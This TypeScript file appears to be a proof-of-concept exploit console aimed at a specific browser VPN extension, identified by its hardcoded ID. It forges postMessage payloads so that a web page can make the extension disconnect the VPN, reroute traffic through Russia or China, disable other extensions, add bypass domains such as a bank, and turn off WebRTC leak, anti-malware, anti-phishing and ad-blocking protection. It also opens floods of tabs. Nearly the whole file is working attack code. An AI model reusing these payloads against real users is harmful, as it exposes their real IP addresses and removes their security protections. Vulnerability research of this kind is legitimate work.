export const EXTENSION_ID = 'eppiocemhmnlbhjplcgkofciiegomcon'

export type ExploitType =
  | 'openTab'
  | 'tabBomb'
  | 'navigateTab'
  | 'disconnectVPN'
  | 'connectToRussia'
  | 'connectToChina'
  | 'getVPNState'
  | 'disableExtensions'
  | 'getExtensionList'
  | 'addBypassDomain'
  | 'getBypassList'
  | 'enableWebRTC'
  | 'disableWebRTC'
  | 'disableAntiMalware'
  | 'enableAntiMalware'
  | 'disableAntiPhishing'
  | 'enableAntiPhishing'
  | 'disableAdBlocker'
  | 'enableAdBlocker'
  | 'disableDataCollection'
  | 'enableDataCollection'

interface BasePayload {
  extensionId: string
  sender: string
  requestId?: string
  message: {
    type: string
    toadName: string
    payload: {
      to: string
      message: {
        type: string
        payload?: unknown
      }
    }
  }
}

// Sync payload - fire and forget
const createPayload = (messageType: string, payload?: unknown): BasePayload => ({
  extensionId: EXTENSION_ID,
  sender: 'Toad',
  message: {
    type: 'Toad.FromToad',
    toadName: 'Exploit',
    payload: {
      to: 'Mario',
      message: {
        type: messageType,
        ...(payload !== undefined && { payload }),
      },
    },
  },
})

// Async payload - expects response
const createAsyncPayload = (messageType: string, payload?: unknown): BasePayload => {
  const requestId = `req-${Date.now()}-${Math.random().toString(36).substr(2, 9)}`
  return {
    extensionId: EXTENSION_ID,
    sender: 'Toad',
    requestId,
    message: {
      type: 'Toad.FromToadAsync',
      toadName: 'Exploit',
      payload: {
        to: 'Mario',
        message: {
          type: messageType,
          ...(payload !== undefined && { payload }),
        },
      },
    },
  }
}

export const exploitPayloads = {
  openTab: (url: string) => createPayload('Tab.OpenTab', { url }),

  tabBomb: (count: number, durationMs: number = 3000) => {
    const url = 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'

    // Calculate exponential timing - tabs open faster as time goes on
    const delays: number[] = []
    let totalWeight = 0
    for (let i = 0; i < count; i++) {
      const weight = Math.pow(2, i / count)
      totalWeight += weight
    }

    let accumulatedTime = 0
    for (let i = 0; i < count; i++) {
      const weight = Math.pow(2, i / count)
      const delay = (weight / totalWeight) * durationMs
      delays.push(accumulatedTime)
      accumulatedTime += delay
    }

    delays.forEach((delay) => {
      setTimeout(() => {
        const payload = createPayload('Tab.OpenTab', { url, active: true })
        window.postMessage(payload, '*')
      }, delay)
    })

    return []
  },

  navigateTab: (url: string) => createPayload('Tab.OpenTab', { url, active: true }),

  // VPN Control
  disconnectVPN: () => createPayload('LocationProcessor.Disconnect'),

  connectToCountry: (countryCode: string) =>
    createPayload('LocationProcessor.Connect', {
      location: {
        code: countryCode,
        type: 'ACCESSIBLE',
        provider: 'GENERIC',
      },
      excludedProviders: [],
    }),

  getVPNState: () => createAsyncPayload('LocationProcessor.GetState', {}),

  // Extension Control
  disableExtensions: () => createPayload('InterruptExtensions.DisableInterruptedExtensions'),

  getExtensionList: () => createAsyncPayload('InterruptExtensions.GetInterruptedExtensionsList', {}),

  // Bypass List
  addBypassDomain: (domain: string) =>
    createPayload('BypassMessages.AddItem', {
      item: { value: domain, scope: 'user' },
      options: { domainDependant: true, store: true },
    }),

  getBypassList: () => createAsyncPayload('BypassMessages.GetList', { filter: {} }),

  // WebRTC Leak Prevention
  // state: true = protection ON, state: false = protection OFF (leaks IP!)
  enableWebRTC: () => createPayload('WebRTCLeakPrevention.Toggle', { state: true }),
  disableWebRTC: () => createPayload('WebRTCLeakPrevention.Toggle', { state: false }),
  // Anti-Malware Control
  disableAntiMalware: () => createPayload('AntiMaleWare.Disable'),
  enableAntiMalware: () => createPayload('AntiMaleWare.Enable'),
  checkAntiMalware: () => createAsyncPayload('AntiMaleWare.isEnabled', {}),

  // Anti-Phishing (SafeBrowsing) - controlled via consent
  disableAntiPhishing: () => createPayload('AntiMaleWare.SetConsent', { agreed: false }),
  enableAntiPhishing: () => createPayload('AntiMaleWare.SetConsent', { agreed: true }),
  checkAntiPhishing: () => createAsyncPayload('AntiMaleWare.IsConsentAgreed', {}),

  // Anti-Malicious Ads (AdBlocker)
  disableAdBlocker: () => createPayload('AdBlockerProcessor.Disable'),
  enableAdBlocker: () => createPayload('AdBlockerProcessor.Enable'),

  // Data Collection (Privacy) - true = opted out, false = opted in
  disableDataCollection: () => createPayload('DataCollectionStateMessage.Set', true),
  enableDataCollection: () => createPayload('DataCollectionStateMessage.Set', false),
}

export const sendExploitPayload = (payload: BasePayload | BasePayload[]): void => {
  if (Array.isArray(payload)) {
    payload.forEach((p) => window.postMessage(p, '*'))
  } else {
    window.postMessage(payload, '*')
  }
}

// Send async payload and wait for response
export const sendAsyncExploitPayload = <T = unknown>(
  payload: BasePayload,
  timeoutMs: number = 5000
): Promise<T | null> => {
  return new Promise((resolve) => {
    const requestId = payload.requestId

    const handler = (e: MessageEvent) => {
      if (e.data?.sender === 'Mario' && e.data?.requestId === requestId) {
        window.removeEventListener('message', handler)
        resolve(e.data.message?.payload?.response ?? null)
      }
    }

    window.addEventListener('message', handler)
    window.postMessage(payload, '*')

    setTimeout(() => {
      window.removeEventListener('message', handler)
      resolve(null)
    }, timeoutMs)
  })
}

export interface ExploitConfig {
  id: ExploitType
  name: string
  description: string
  category: 'tab' | 'vpn' | 'security' | 'extension' | 'session'
  severity: 'critical' | 'high' | 'medium' | 'info'
  requiresInput?: boolean
  inputLabel?: string
  inputDefault?: string
}

export const EXPLOIT_CONFIGS: ExploitConfig[] = [
  // VPN Control
  {
    id: 'disconnectVPN',
    name: 'Disconnect VPN',
    description: 'Force disconnect VPN - EXPOSES USER REAL IP!',
    category: 'vpn',
    severity: 'critical',
  },
  {
    id: 'connectToRussia',
    name: 'Connect to Russia',
    description: 'Force VPN to connect through Russian servers',
    category: 'vpn',
    severity: 'critical',
  },
  {
    id: 'connectToChina',
    name: 'Connect to China',
    description: 'Force VPN to connect through Chinese servers',
    category: 'vpn',
    severity: 'critical',
  },
  {
    id: 'getVPNState',
    name: 'Get VPN State',
    description: 'Retrieve current VPN status, location, proxy, and connection duration',
    category: 'vpn',
    severity: 'info',
  },
  // Extension Control
  {
    id: 'disableExtensions',
    name: 'Disable Competing Extensions',
    description: 'Disable ALL extensions with "proxy" permission (other VPNs, ad blockers)',
    category: 'extension',
    severity: 'critical',
  },
  {
    id: 'getExtensionList',
    name: 'List Vulnerable Extensions',
    description: 'Get list of extensions that can be disabled',
    category: 'extension',
    severity: 'info',
  },
  // Bypass List
  {
    id: 'addBypassDomain',
    name: 'Add Bypass Domain',
    description: 'Add domain to bypass VPN - traffic to this domain exposes real IP!',
    category: 'security',
    severity: 'critical',
    requiresInput: true,
    inputLabel: 'Domain (e.g. bankofamerica.com)',
    inputDefault: 'bankofamerica.com',
  },
  {
    id: 'getBypassList',
    name: 'Get Bypass List',
    description: 'Retrieve current VPN bypass list',
    category: 'security',
    severity: 'info',
  },
  // WebRTC Leak Prevention
  {
    id: 'disableWebRTC',
    name: 'Disable WebRTC Protection',
    description: 'Disable WebRTC leak protection - real IP will leak via WebRTC!',
    category: 'security',
    severity: 'critical',
  },
  {
    id: 'enableWebRTC',
    name: 'Enable WebRTC Protection',
    description: 'Re-enable WebRTC leak protection',
    category: 'security',
    severity: 'info',
  },
  // Anti-Malware
  {
    id: 'disableAntiMalware',
    name: 'Disable Anti-Malware',
    description: 'Disable the extension anti-malware protection',
    category: 'security',
    severity: 'critical',
  },
  {
    id: 'enableAntiMalware',
    name: 'Enable Anti-Malware',
    description: 'Re-enable the extension anti-malware protection',
    category: 'security',
    severity: 'info',
  },
  // Anti-Phishing (SafeBrowsing)
  {
    id: 'disableAntiPhishing',
    name: 'Disable Anti-Phishing',
    description: 'Disable phishing/safe browsing protection',
    category: 'security',
    severity: 'critical',
  },
  {
    id: 'enableAntiPhishing',
    name: 'Enable Anti-Phishing',
    description: 'Re-enable phishing/safe browsing protection',
    category: 'security',
    severity: 'info',
  },
  // Anti-Malicious Ads (AdBlocker)
  {
    id: 'disableAdBlocker',
    name: 'Disable Anti-Malicious Ads',
    description: 'Disable the ad blocker / anti-malicious ads protection',
    category: 'security',
    severity: 'critical',
  },
  {
    id: 'enableAdBlocker',
    name: 'Enable Anti-Malicious Ads',
    description: 'Re-enable the ad blocker / anti-malicious ads protection',
    category: 'security',
    severity: 'info',
  },
]

export const getCategoryLabel = (category: ExploitConfig['category']): string => {
  const labels: Record<ExploitConfig['category'], string> = {
    tab: 'Tab Manipulation',
    vpn: 'VPN Control',
    security: 'Security Bypass',
    extension: 'Extension Attacks',
    session: 'Extension Tracking ID',
  }
  return labels[category]
}

export const getSeverityColor = (severity: ExploitConfig['severity']): string => {
  const colors: Record<ExploitConfig['severity'], string> = {
    critical: '#ff0040',
    high: '#ff6600',
    medium: '#ffcc00',
    info: '#00ffff',
  }
  return colors[severity]
}
